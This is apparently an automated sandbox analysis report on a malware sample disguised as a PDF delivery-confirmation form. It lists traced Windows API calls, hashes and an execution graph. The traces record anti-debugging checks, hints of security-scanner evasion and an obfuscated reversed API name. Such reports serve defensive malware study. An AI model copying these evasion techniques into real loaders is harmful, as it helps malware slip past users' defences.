                                                                  • Instruction ID: f95c1221b4e02000fe6cf1048537e305bcbcbc102848637c133236705bf0bb53
                                                                  • Opcode Fuzzy Hash: ec25660e3807bf3243aa72f0974c8765ff6b752934edff3518f760832bbf4ca0
                                                                  • Instruction Fuzzy Hash: 52016D78A40304AFEF14EFA4DC41E9E77AEEB49710F524864B645E7B50DA30ED11DA24
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,02CDAA6F,?,?,00000000), ref: 02CDA9F0
                                                                    • Part of subcall function 02CDA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CDA76A
                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02CDAA6F,?,?,00000000), ref: 02CDAA20
                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02CDAA2B
                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02CDAA6F,?,?,00000000), ref: 02CDAA49
                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02CDAA54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                  • String ID:
                                                                  • API String ID: 4102113445-0
                                                                  • Opcode ID: c620abcd813e8df973bae6d67502706dae859221069a79522389e88de50206af
                                                                  • Instruction ID: e1b23f0455de8a3e1a0c97a692e21fefa73043f7e1bb344db546febaf4fcde67
                                                                  • Opcode Fuzzy Hash: c620abcd813e8df973bae6d67502706dae859221069a79522389e88de50206af
                                                                  • Instruction Fuzzy Hash: 560126356806446FF302F7B4DD12B6E735DDB46724FA10660F704A66C0E6749E01DEA4
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,02CDAC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02CDAAB7
                                                                    • Part of subcall function 02CDA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CDA76A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: eeee$ggg$yyyy
                                                                  • API String ID: 4232894706-1253427255
                                                                  • Opcode ID: b73025ae3bcfd1bdd1b99e9c214b7106d9994d236473db95ac2bc8a372786aa2
                                                                  • Instruction ID: 17524aec0ee601cde016c255ec0e990737affbbd61b42a41bf749d2544976cb9
                                                                  • Opcode Fuzzy Hash: b73025ae3bcfd1bdd1b99e9c214b7106d9994d236473db95ac2bc8a372786aa2
                                                                  • Instruction Fuzzy Hash: 694116753049054BC729AB7988803BFB3EBDBC5210F504E25D762D7344E736EE06DA21
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc
                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                  • API String ID: 1883125708-1952140341
                                                                  • Opcode ID: 8d00d13b451847b0f8f3e01c147248a9bf10615cba41f04979590610ce17a904
                                                                  • Instruction ID: 57b52c9a69c316c24a27ec32bb3f371cab43e7cd271ca4d9cea452028c489b07
                                                                  • Opcode Fuzzy Hash: 8d00d13b451847b0f8f3e01c147248a9bf10615cba41f04979590610ce17a904
                                                                  • Instruction Fuzzy Hash: 81F09075640304AFEF11EFB4DC4295E77ADEB49B00B910A60F606E3B20D730AD10DE64
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KernelBase,?,02CEEF98,UacInitialize,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,Initialize), ref: 02CEEB9A
                                                                  • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CEEBAC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsDebuggerPresent$KernelBase
                                                                  • API String ID: 1646373207-2367923768
                                                                  • Opcode ID: 08d947b08f39e7459e0191f99cc36723f5986f611e8363334f808bd97bf46d81
                                                                  • Instruction ID: a2bc5b9b9b1b8e49f1723aa5aac8fef0ea35b9cef5ca89dbd7ce9630ddedc097
                                                                  • Opcode Fuzzy Hash: 08d947b08f39e7459e0191f99cc36723f5986f611e8363334f808bd97bf46d81
                                                                  • Instruction Fuzzy Hash: 6BD08CA67697101EFE0036F42CC4C1E02CD89455BE3340FB1F223D60D2E7BAC913A518
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,02CFC10B,00000000,02CFC11E), ref: 02CDC402
                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02CDC413
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                  • API String ID: 1646373207-3712701948
                                                                  • Opcode ID: 5abf23f6167182fad5c1a93d0434103b398cf94d307ded93e9ea36afc0ab7b4b
                                                                  • Instruction ID: 787ca8e3a90725154ad61ce7201d2b88f852870a97b3f02cd2109a9752144c98
                                                                  • Opcode Fuzzy Hash: 5abf23f6167182fad5c1a93d0434103b398cf94d307ded93e9ea36afc0ab7b4b
                                                                  • Instruction Fuzzy Hash: 90D05EA0A803014FE3005AB1E88073A368C8B48706B50593BE30345102C7B15614DFC4
                                                                  APIs
                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02CDE21F
                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02CDE23B
                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02CDE2B2
                                                                  • VariantClear.OLEAUT32(?), ref: 02CDE2DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                  • String ID:
                                                                  • API String ID: 920484758-0
                                                                  • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                  • Instruction ID: ba2e725c8fd9a3df3baab89c48e3017dfc50bb9fa7fbd4036c8017693ffbc04f
                                                                  • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                  • Instruction Fuzzy Hash: 4C410B76A0061D9FCB61EB58CC90BD9B3BDAF48314F0041D5E649AB252DA30AF809F50
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CDACE1
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CDAD05
                                                                  • GetModuleFileNameA.KERNEL32(02CD0000,?,00000105), ref: 02CDAD20
                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CDADB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID:
                                                                  • API String ID: 3990497365-0
                                                                  • Opcode ID: 35de8ce4d90a94b08cab8f503c0fe1cfcd9db000bcb22a524e8b25f4a6a1d1ec
                                                                  • Instruction ID: 8283c39363104a994953a0e82ad9496399c84448969d43405ac65698c9463a3d
                                                                  • Opcode Fuzzy Hash: 35de8ce4d90a94b08cab8f503c0fe1cfcd9db000bcb22a524e8b25f4a6a1d1ec
                                                                  • Instruction Fuzzy Hash: BD412771A402589BDB21EB68CC84BDAB7FDAB18301F0044EAE648E7241DB759F88DF50
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CDACE1
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CDAD05
                                                                  • GetModuleFileNameA.KERNEL32(02CD0000,?,00000105), ref: 02CDAD20
                                                                  • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CDADB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID:
                                                                  • API String ID: 3990497365-0
                                                                  • Opcode ID: 37c1232fa1feb1cf230d82e75830e497d751984c688b58584791b53fccdd2df6
                                                                  • Instruction ID: 391727157fe1969ccc88cf4287b2eb9c2eb5f91d5c90061955e3ec3ee64b33ec
                                                                  • Opcode Fuzzy Hash: 37c1232fa1feb1cf230d82e75830e497d751984c688b58584791b53fccdd2df6
                                                                  • Instruction Fuzzy Hash: AB414971A402589FDB21EB68CC84BDAB7FDAB08301F0044EAE648E7241DB759F88DF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: daa9f7604cd7caede2bf837044b3959eb66a61694ab75742738de00ceb2add43
                                                                  • Instruction ID: 1b90481f8bcfb5a4a827972d3b192e2f0941a3f6595de131ec649519f224db0c
                                                                  • Opcode Fuzzy Hash: daa9f7604cd7caede2bf837044b3959eb66a61694ab75742738de00ceb2add43
                                                                  • Instruction Fuzzy Hash: 13A1E6767106000BE719AA7C9D843BEB3C2DBC4225F1D427EE31DCB381EBE5DA469650
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02CD9562), ref: 02CD94FA
                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02CD9562), ref: 02CD9500
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: DateFormatLocaleThread
                                                                  • String ID: yyyy
                                                                  • API String ID: 3303714858-3145165042
                                                                  • Opcode ID: 8541559141144519e607ff232b272905dff29e33ff04ae690b69b0e39dc8d836
                                                                  • Instruction ID: bcc6cd255990eb144aec0407d177b88479653b76ad13b16f33c5954b7ebb7d76
                                                                  • Opcode Fuzzy Hash: 8541559141144519e607ff232b272905dff29e33ff04ae690b69b0e39dc8d836
                                                                  • Instruction Fuzzy Hash: 53216079A002189FDB25EF94C881AAEB3B9EF48710F5140A5EB05E7250E630DF40DF65
                                                                  APIs
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CE8216), ref: 02CE81F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                  • API String ID: 3811539418-184458249
                                                                  • Opcode ID: 31dca644c3f90dd936dff865284f104d2059c9385ba8783eb9d73e73032d379d
                                                                  • Instruction ID: 53f5318aa1e2c0e2d5bcaacd40b03584be7c379fd03055f1143e5f6e01f53f1a
                                                                  • Opcode Fuzzy Hash: 31dca644c3f90dd936dff865284f104d2059c9385ba8783eb9d73e73032d379d
                                                                  • Instruction Fuzzy Hash: 9A016975640304AFEB25EFA4DC42F5E77ADEB48B00F614570B609E7A50DA74ED109F24
                                                                  APIs
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CEAD98
                                                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 02CEADC8
                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 02CEADE7
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CEADF3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Read$Write
                                                                  • String ID:
                                                                  • API String ID: 3448952669-0
                                                                  • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                  • Instruction ID: 2b52897d6587d46c860bb51775b6f3bfec5cf9ecc6a708306f064505a4fd4603
                                                                  • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                  • Instruction Fuzzy Hash: 8C219A75A402199FDF10DF55DC80B9EB7B9FF84356F104111EE5197340DB34DA11E6A4

                                                                  Execution Graph

                                                                  Execution Coverage:0.9%
                                                                  Dynamic/Decrypted Code Coverage:5.3%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:133
                                                                  Total number of Limit Nodes:14
                                                                  execution_graph 90483 430063 90484 430089 90483->90484 90485 4300db 90484->90485 90488 429ec3 90484->90488 90487 430130 90489 429f21 90488->90489 90491 429f35 90489->90491 90492 417bb3 90489->90492 90491->90487 90493 417b81 90492->90493 90496 417bc6 90492->90496 90494 417b93 LdrLoadDll 90493->90494 90495 417baa 90493->90495 90494->90495 90495->90491 90496->90491 90497 425143 90498 42515c 90497->90498 90499 4251e9 90498->90499 90500 4251a4 90498->90500 90503 4251e4 90498->90503 90505 42ebe3 90500->90505 90504 42ebe3 RtlFreeHeap 90503->90504 90504->90499 90508 42ce73 90505->90508 90507 4251b4 90509 42ce90 90508->90509 90510 42cea1 RtlFreeHeap 90509->90510 90510->90507 90511 42fce3 90512 42ebe3 RtlFreeHeap 90511->90512 90513 42fcf8 90512->90513 90514 42fc83 90515 42fc93 90514->90515 90516 42fc99 90514->90516 90519 42ecc3 90516->90519 90518 42fcbf 90522 42ce23 90519->90522 90521 42ecde 90521->90518 90523 42ce40 90522->90523 90524 42ce51 RtlAllocateHeap 90523->90524 90524->90521 90525 424da3 90526 424dbf 90525->90526 90527 424de7 90526->90527 90528 424dfb 90526->90528 90529 42cb13 NtClose 90527->90529 90535 42cb13 90528->90535 90531 424df0 90529->90531 90532 424e04 90538 42ed03 RtlAllocateHeap 90532->90538 90534 424e0f 90536 42cb30 90535->90536 90537 42cb41 NtClose 90536->90537 90537->90532 90538->90534 90539 429e23 90540 429e87 90539->90540 90541 429eba 90540->90541 90544 413e43 90540->90544 90543 429e9c 90545 413e0e 90544->90545 90546 413e52 90544->90546 90549 42cd93 90545->90549 90550 42cdad 90549->90550 90553 22ab2c70 LdrInitializeThunk 90550->90553 90551 413e25 90551->90543 90553->90551 90554 413fe3 90558 414003 90554->90558 90556 414062 90557 41406c 90558->90557 90559 41b793 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 90558->90559 90559->90556 90560 414083 90561 4140a9 90560->90561 90563 4140d3 90561->90563 90564 413e03 LdrInitializeThunk 90561->90564 90564->90563 90565 22ab2b60 LdrInitializeThunk 90566 42c0f3 90567 42c110 90566->90567 90570 22ab2df0 LdrInitializeThunk 90567->90570 90568 42c138 90570->90568 90571 401af2 90572 401b20 90571->90572 90573 401bf3 EntryPoint 90572->90573 90574 401c20 90573->90574 90574->90574 90577 430153 90574->90577 90580 42e793 90577->90580 90581 42e7b9 90580->90581 90590 4075c3 90581->90590 90583 42e7cf 90584 401c2a 90583->90584 90593 41b483 90583->90593 90586 42e7ee 90587 42e803 90586->90587 90588 42cec3 ExitProcess 90586->90588 90604 42cec3 90587->90604 90588->90587 90607 4167e3 90590->90607 90592 4075d0 90592->90583 90594 41b4af 90593->90594 90625 41b373 90594->90625 90597 41b4f4 90600 41b510 90597->90600 90602 42cb13 NtClose 90597->90602 90598 41b4dc 90599 41b4e7 90598->90599 90601 42cb13 NtClose 90598->90601 90599->90586 90600->90586 90601->90599 90603 41b506 90602->90603 90603->90586 90605 42cee0 90604->90605 90606 42cef1 ExitProcess 90605->90606 90606->90584 90608 416800 90607->90608 90610 416819 90608->90610 90611 42d573 90608->90611 90610->90592 90613 42d58d 90611->90613 90612 42d5bc 90612->90610 90613->90612 90618 42c143 90613->90618 90616 42ebe3 RtlFreeHeap 90617 42d635 90616->90617 90617->90610 90619 42c15d 90618->90619 90622 22ab2c0a 90619->90622 90620 42c189 90620->90616 90623 22ab2c1f LdrInitializeThunk 90622->90623 90624 22ab2c11 90622->90624 90623->90620 90624->90620 90626 41b469 90625->90626 90627 41b38d 90625->90627 90626->90597 90626->90598 90631 42c1e3 90627->90631 90630 42cb13 NtClose 90630->90626 90632 42c1fd 90631->90632 90635 22ab35c0 LdrInitializeThunk 90632->90635 90633 41b45d 90633->90630 90635->90633 90636 41b673 90637 41b6b7 90636->90637 90638 41b6d8 90637->90638 90639 42cb13 NtClose 90637->90639 90639->90638 90640 41e873 90641 41e899 90640->90641 90645 41e996 90641->90645 90646 42fd23 RtlAllocateHeap RtlFreeHeap 90641->90646 90643 41e934 90644 42c143 LdrInitializeThunk 90643->90644 90643->90645 90644->90645 90646->90643 90647 4190f8 90648 42cb13 NtClose 90647->90648 90649 419102 90648->90649
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000001.2240612086.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
